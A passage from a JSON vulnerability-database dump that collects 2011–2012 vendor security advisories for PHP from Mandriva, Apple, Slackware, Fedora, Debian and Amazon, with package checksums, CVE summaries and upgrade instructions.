71043e5371ce75f9f0cb63df38021fdb mes5/x86_64/php-tclink-3.4.5-0.2mdvmes5.2.x86_64.rpm\r\n 215a92aa7004ea738f44aed3e1168b9c mes5/x86_64/php-tidy-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n efc0a9750197c1b1f5158c8c1e55c27b mes5/x86_64/php-timezonedb-2012.3-0.1mdvmes5.2.x86_64.rpm\r\n c7debf59191371056785b18a4a99c276 mes5/x86_64/php-tokenizer-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 26be1bde74ac0ce9f0b442cb4c81a9be mes5/x86_64/php-translit-0.6.1-0.1mdvmes5.2.x86_64.rpm\r\n c99427fc99b451727ac42a9b96a5537c mes5/x86_64/php-vld-0.11.1-0.1mdvmes5.2.x86_64.rpm\r\n 2743db76a4ec5fd0a67dbd68bf1229a4 mes5/x86_64/php-wddx-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 6af7e7503ffe3d4141f222fb0701e817 mes5/x86_64/php-xattr-1.1.0-2.6mdvmes5.2.x86_64.rpm\r\n 85f807ce183c7b843701fd8899ef0991 mes5/x86_64/php-xcache-1.3.2-0.1mdvmes5.2.x86_64.rpm\r\n a62dad29f5eade1f3d3864b25dff3f2d mes5/x86_64/php-xcache-admin-1.3.2-0.1mdvmes5.2.x86_64.rpm\r\n bbf6d7585d06df26bcfa3b73dab0007c mes5/x86_64/php-xdebug-2.1.4-0.1mdvmes5.2.x86_64.rpm\r\n a5f092be6c7ca43ad60913afb67885e6 mes5/x86_64/php-xml-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 65ef3be867bd8427c1f5d41131de8249 mes5/x86_64/php-xmlreader-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n d0c2192b6b08ef59e912fcbd272c98be mes5/x86_64/php-xmlrpc-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 1c529b0215628a4d699542742dddb80e mes5/x86_64/php-xmlwriter-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 78df5fc0a2128aa9658b426cd8378b35 mes5/x86_64/php-xsl-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n dadfa8975b5a1a141b2f454d370c59f6 mes5/x86_64/php-yaz-1.1.1-0.1mdvmes5.2.x86_64.rpm\r\n 9caa5cd5185ae316a091de219fd984d9 mes5/x86_64/php-zip-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 92ac01caa79c1d542fe06e4aae21ff0b mes5/x86_64/php-zlib-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n fb2eadb2172166381d594394916add79 mes5/x86_64/python-SWF-0.4.4-0.1mdvmes5.2.x86_64.rpm\r\n 5fdd248cb611e7997ddc828e8a90c043 mes5/x86_64/sphinx-0.9.9-0.1mdvmes5.2.x86_64.rpm\r\n b3d72ab63f47dd5a0f3b1f147321bcab mes5/x86_64/stemwords-0-5.1mdvmes5.2.x86_64.rpm\r\n cfada59c5348ee46e44202376cf042c5 mes5/x86_64/yaz-3.0.48-0.1mdvmes5.2.x86_64.rpm \r\n 2bac0388ad669fc836a910cb6919733e mes5/SRPMS/apache-mod_php-5.3.13-0.1mdvmes5.2.src.rpm\r\n 0dd8c597a6a39e17b504408fa4f894d1 mes5/SRPMS/lemon-3.7.4-0.1mdvmes5.2.src.rpm\r\n 04a50458044ddef8dca4acbecd0555d1 mes5/SRPMS/libmbfl-1.1.0-0.1mdvmes5.2.src.rpm\r\n d9e473396af964f01dd6310844925396 mes5/SRPMS/libmonetra-7.0.4-0.1mdvmes5.2.src.rpm\r\n 0fafe53fccc11afa4b75c66dc49261cd mes5/SRPMS/libstemmer-0-5.1mdvmes5.2.src.rpm\r\n 6de1878b7ff4fbc0b63e381618e966ba mes5/SRPMS/ming-0.4.4-0.1mdvmes5.2.src.rpm\r\n c4041cade9aaf6c4c67f046e4bfbaa74 mes5/SRPMS/php-5.3.13-0.1mdvmes5.2.src.rpm\r\n c0a1c69bca172f69a034505cfd6b37fc mes5/SRPMS/php-apc-3.1.10-0.1mdvmes5.2.src.rpm\r\n df8c3520a450cb4209179f60cf8828cd mes5/SRPMS/php-dbx-1.1.0-30.2mdvmes5.2.src.rpm\r\n 7705d28806c6a73a9e588d174203ec11 mes5/SRPMS/php-dio-0.0.5-0.1mdvmes5.2.src.rpm\r\n cb9fd58d04a1db3ceec2f9b15c5ddac0 mes5/SRPMS/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.src.rpm\r\n d1e7c7da449372f62c27a0cd3eeb8a8d mes5/SRPMS/php-fam-5.0.1-3.6mdvmes5.2.src.rpm\r\n 4c10d297abc9ea2a4dfe2cc441be619c mes5/SRPMS/php-filepro-5.1.6-13.6mdvmes5.2.src.rpm\r\n 7c30fe50ac1dc23870c64660300e78f8 mes5/SRPMS/php-gtk2-2.0.1-2.2mdvmes5.2.src.rpm\r\n ecdbedc8c745921ab7e8c97850c7e976 mes5/SRPMS/php-imagick-3.0.1-0.2mdvmes5.2.src.rpm\r\n c31069ae710a67783a81adf905f72842 mes5/SRPMS/php-ini-5.3.13-0.1mdvmes5.2.src.rpm\r\n 7bba5d67278539bbfe8980f4619fc443 mes5/SRPMS/php-mailparse-2.1.6-0.1mdvmes5.2.src.rpm\r\n c064fa5008b99634cf43dd8cfcfc38a8 mes5/SRPMS/php-mcal-0.6-23.6mdvmes5.2.src.rpm\r\n 4dc1c969e13503b5b84e4cc2a62fcafa mes5/SRPMS/php-mcve-7.0.3-0.2mdvmes5.2.src.rpm\r\n 8a0b00a7eb45735c7f1b84db2124a02a mes5/SRPMS/php-mdbtools-1.0.0-4.2mdvmes5.2.src.rpm\r\n 50514e567296ef853fc9c040b27fde14 mes5/SRPMS/php-memcache-3.0.6-0.2mdvmes5.2.src.rpm\r\n 3d68803bc8d4d5db837d034e31b559ab mes5/SRPMS/php-ming-5.2.10-0.2mdvmes5.2.src.rpm\r\n 3788a033464659c7697271fe3e11cb6b mes5/SRPMS/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.src.rpm\r\n 4e41590da9fd097f6ecb0cf362bf99f9 mes5/SRPMS/php-perl-1.0.0-32.2mdvmes5.2.src.rpm\r\n 8227db814a6322c4a1c72717965be834 mes5/SRPMS/php-radius-1.2.5-7.2mdvmes5.2.src.rpm\r\n b6eea216f82a274151c12bb38e50793c mes5/SRPMS/php-sasl-0.1.0-21.6mdvmes5.2.src.rpm\r\n aefb4d8a934bd9ecf18f10cf94508b21 mes5/SRPMS/php-sphinx-1.2.0-0.1mdvmes5.2.src.rpm\r\n 27acc20ae9792b5ee79127428c76d019 mes5/SRPMS/php-ssh2-0.11.3-0.1mdvmes5.2.src.rpm\r\n 8561139b4f53146b52d0d881c93bd884 mes5/SRPMS/php-suhosin-0.9.33-0.1mdvmes5.2.src.rpm\r\n 9decd2138202b8f51428b69f8d089679 mes5/SRPMS/php-tclink-3.4.5-0.2mdvmes5.2.src.rpm\r\n a331ac0e06665fb2b1696eeb35ddd67b mes5/SRPMS/php-timezonedb-2012.3-0.1mdvmes5.2.src.rpm\r\n 79c414525991c894f01d9e597cda78f6 mes5/SRPMS/php-translit-0.6.1-0.1mdvmes5.2.src.rpm\r\n 93897f5b7d60138c9e12474dc8388954 mes5/SRPMS/php-vld-0.11.1-0.1mdvmes5.2.src.rpm\r\n 9f2b8c72495c63762e02a4792b321463 mes5/SRPMS/php-xattr-1.1.0-2.6mdvmes5.2.src.rpm\r\n bec964b1764e87c0ba2d78ec3c33f662 mes5/SRPMS/php-xcache-1.3.2-0.1mdvmes5.2.src.rpm\r\n 6e3b637199e13bd895401f2cadbf25c5 mes5/SRPMS/php-xdebug-2.1.4-0.1mdvmes5.2.src.rpm\r\n 7b1f065bc086533fa01adba07235c4fe mes5/SRPMS/php-yaz-1.1.1-0.1mdvmes5.2.src.rpm\r\n 51586ceaba69e3a61e4171c1b33821ad mes5/SRPMS/sphinx-0.9.9-0.1mdvmes5.2.src.rpm\r\n fb8632c3872b5f62b8fdc070565d21b6 mes5/SRPMS/xmlrpc-epi-0.54-0.1mdvmes5.2.src.rpm\r\n 7737d7193bce052e26930d49ee7e841f mes5/SRPMS/yaz-3.0.48-0.1mdvmes5.2.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niD8DBQFPq6gTmqjQ0CJFipgRAqvVAJ9zEwWjj1SD2W0x+6Nb/vNvjYO4oQCg6O6L\r\nwF916W6TuFcSv/gD10fMyoE=\r\n=Va72\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-05-14T00:00:00", "published": "2012-05-14T00:00:00", "id": "SECURITYVULNS:DOC:28070", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28070", "title": "[ MDVSA-2012:071 ] php", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2011-3462", "CVE-2011-3448", "CVE-2011-1148", "CVE-2011-3444", "CVE-2011-1783", "CVE-2011-3246", "CVE-2011-3249", "CVE-2011-3189", "CVE-2011-0241", "CVE-2011-1752", "CVE-2011-1938", "CVE-2011-3449", "CVE-2011-3441", "CVE-2011-3453", "CVE-2011-3422", "CVE-2011-3248", "CVE-2011-2483", "CVE-2011-3457", "CVE-2010-2813", "CVE-2011-3463", "CVE-2011-3389", "CVE-2011-2204", "CVE-2011-3256", "CVE-2011-1657", "CVE-2011-1167", "CVE-2011-3252", "CVE-2011-3268", "CVE-2011-3328", "CVE-2011-2023", "CVE-2011-3182", "CVE-2010-4554", "CVE-2011-1921", "CVE-2011-3459", "CVE-2010-4555", "CVE-2011-3250", "CVE-2011-0200", "CVE-2011-3267", "CVE-2011-3458", "CVE-2011-3447", "CVE-2011-3460", "CVE-2011-2202", "CVE-2011-3452", "CVE-2011-3450", "CVE-2011-2895", "CVE-2010-1637", "CVE-2011-2937", "CVE-2011-2192"], "description": "Graphics, Video, Audio and documents parsing vulnerabilities. Information leakage, code execution via DNS resolver. Privilege escalation. Vulnerabilities in 3rd party packages.", "edition": 1, "modified": "2012-02-03T00:00:00", "published": "2012-02-03T00:00:00", "id": "SECURITYVULNS:VULN:12164", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12164", "title": "Apple OS X multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2020-10-25T16:35:53", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483"], "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\n13.1, 13.37, and -current to fix security issues.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/php-5.3.8-i486-1_slack13.37.txz: Upgraded.\n Security fixes vs. 5.3.6 (5.3.7 was not usable):\n Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n Fixed crash in error_log(). Reported by Mateusz Kocielski\n Fixed buffer overflow on overlog salt in crypt().\n Fixed bug #54939 (File path injection vulnerability in RFC1867\n File upload filename). Reported by Krzysztof Kotowicz. (CVE-2011-2202)\n Fixed stack buffer overflow in socket_connect(). (CVE-2011-1938)\n Fixed bug #54238 (use-after-free in substr_replace()). (CVE-2011-1148)\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1148\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2202\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483\n For those upgrading from PHP 5.2.x, be aware that quite a bit has\n changed, and it will very likely not 'drop in', but PHP 5.2.x is not\n supported by php.net any longer, so there wasn't a lot of choice\n in the matter. We're not able to support a security fork of\n PHP 5.2.x here either, so you'll have to just bite the bullet on\n this. You'll be better off in the long run. :)\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.3.8-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.3.8-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.3.8-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.3.8-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/php-5.3.8-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/php-5.3.8-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/php-5.3.8-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/php-5.3.8-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/php-5.3.8-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/php-5.3.8-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.3.8-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.3.8-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n9c68e64817dc0303a098463f3449d457 php-5.3.8-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\ne87e96a218cfc61be65c5662dc51af88 php-5.3.8-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n83de1f7eee73c4b84c890e39b7a587d6 php-5.3.8-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n68995a7d24e2fb0666cab69310f2c2b4 php-5.3.8-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nccf32b94bf48fdc5ed96ab5fa80cfd14 php-5.3.8-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8e7fed1682a30dffb25b5ebe5bf2f8d1 php-5.3.8-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n4c9be7c00bb297bad6dd2aeae759f116 php-5.3.8-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n4f8f56e6f70a89712d96dac2380d8c85 php-5.3.8-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nc44bb52de43ed2ff2cf00fd4ba5b218a php-5.3.8-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n54149726aef87ef3da9b5abe5fe27252 php-5.3.8-x86_64-1_slack13.37.txz\n\nSlackware -current package:\n839c90cc461aad85586cdf5d69a9781e n/php-5.3.8-i486-1.txz\n\nSlackware x86_64 -current package:\n330aeaa4a2bff8723641b208678e3d0b n/php-5.3.8-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.3.8-i486-1_slack13.37.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2011-08-25T16:35:35", "published": "2011-08-25T16:35:35", "id": "SSA-2011-237-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2011&m=slackware-security.575575", "type": "slackware", "title": "[slackware-security] php", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2011-09-09T17:13:35", "published": "2011-09-09T17:13:35", "id": "FEDORA:510BA87E81", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: maniadrive-1.2-32.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2011-09-18T22:59:22", "published": "2011-09-18T22:59:22", "id": "FEDORA:7869DC0ACF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: php-5.3.8-1.fc14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2011-09-18T23:00:38", "published": "2011-09-18T23:00:38", "id": "FEDORA:25045C0AD1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-eaccelerator-0.9.6.1-9.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2011-09-18T22:59:22", "published": "2011-09-18T22:59:22", "id": "FEDORA:836B9C0AD2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: php-eaccelerator-0.9.6.1-9.fc14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2011-09-18T23:00:38", "published": "2011-09-18T23:00:38", "id": "FEDORA:2AA70C0AD2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: maniadrive-1.2-32.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2011-09-09T17:13:35", "published": "2011-09-09T17:13:35", "id": "FEDORA:420B0E7205", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-eaccelerator-0.9.6.1-9.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2011-09-09T17:13:35", "published": "2011-09-09T17:13:35", "id": "FEDORA:6126137D07", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.8-1.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2011-09-18T23:00:38", "published": "2011-09-18T23:00:38", "id": "FEDORA:805B3C0ACF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-5.3.8-1.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2202", "CVE-2011-2483", "CVE-2011-3182"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2011-09-18T22:59:22", "published": "2011-09-18T22:59:22", "id": "FEDORA:7F9E2C0AD1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: maniadrive-1.2-32.fc14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:17:40", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0057", "CVE-2011-4566"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2399-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 31, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-1938 CVE-2011-2483 CVE-2011-4566 CVE-2011-4885 \n CVE-2012-0057 \n\nSeveral vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1938\n\n The UNIX socket handling allowed attackers to trigger a buffer overflow\n via a long path name.\n\nCVE-2011-2483\n\n The crypt_blowfish function did not properly handle 8-bit characters,\n which made it easier for attackers to determine a cleartext password\n by using knowledge of a password hash.\n\nCVE-2011-4566\n\n When used on 32 bit platforms, the exif extension could be used to\n trigger an integer overflow in the exif_process_IFD_TAG function\n when processing a JPEG file.\n\nCVE-2011-4885\n\n It was possible to trigger hash collisions predictably when parsing\n form parameters, which allows remote attackers to cause a denial of\n service by sending many crafted parameters.\n\nCVE-2012-0057\n\n When applying a crafted XSLT transform, an attacker could write files\n to arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of this\nfunction: it is now incompatible with some old (wrongly) generated hashes\nfor passwords containing 8-bit characters. See the package NEWS entry\nfor details. This change has not been applied to the Lenny version of PHP.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny14.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze5.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 5.3.9-1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2012-01-31T07:23:47", "published": "2012-01-31T07:23:47", "id": "DEBIAN:DSA-2399-1:367BF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00023.html", "title": "[SECURITY] [DSA 2399-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:24:11", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0057", "CVE-2011-4566"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2399-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 31, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-1938 CVE-2011-2483 CVE-2011-4566 CVE-2011-4885 \n CVE-2012-0057 \n\nA regression was found in the fix for PHP's XSLT transformations\n(CVE-2012-0057). Updated packages are now available to address this\nregression. For reference, the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1938\n\n The UNIX socket handling allowed attackers to trigger a buffer overflow\n via a long path name.\n\nCVE-2011-2483\n\n The crypt_blowfish function did not properly handle 8-bit characters,\n which made it easier for attackers to determine a cleartext password\n by using knowledge of a password hash.\n\nCVE-2011-4566\n\n When used on 32 bit platforms, the exif extension could be used to\n trigger an integer overflow in the exif_process_IFD_TAG function\n when processing a JPEG file.\n\nCVE-2011-4885\n\n It was possible to trigger hash collisions predictably when parsing\n form parameters, which allows remote attackers to cause a denial of\n service by sending many crafted parameters.\n\nCVE-2012-0057\n\n When applying a crafted XSLT transform, an attacker could write files\n to arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of this\nfunction: it is now incompatible with some old (wrongly) generated hashes\nfor passwords containing 8-bit characters. See the package NEWS entry\nfor details. This change has not been applied to the Lenny version of PHP.\n\nNOTE: at the time of release packages for some architectures are still\nbeing built. They will be installed into the archive as soon as they\narrive.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny15.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze6.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 5.3.9-1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 4, "modified": "2012-01-31T15:27:34", "published": "2012-01-31T15:27:34", "id": "DEBIAN:DSA-2399-2:BC1FA", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00024.html", "title": "[SECURITY] [DSA 2399-2] php5 regression fix", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2020-11-10T12:37:15", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3379", "CVE-2011-2202"], "description": "**Issue Overview:**\n\nPHP before 5.3.7 does not properly check the return values of the malloc, calloc, and realloc library functions, which allows context-dependent attackers to cause a denial of service (NULL pointer dereference and application crash) or trigger a buffer overflow by leveraging the ability to provide an arbitrary value for a function argument, related to (1) ext/curl/interface.c, (2) ext/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4) ext/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6) ext/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8) ext/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10) TSRM/tsrm_win32.c, and (11) the strtotime function.\n\nThe is_a function in PHP 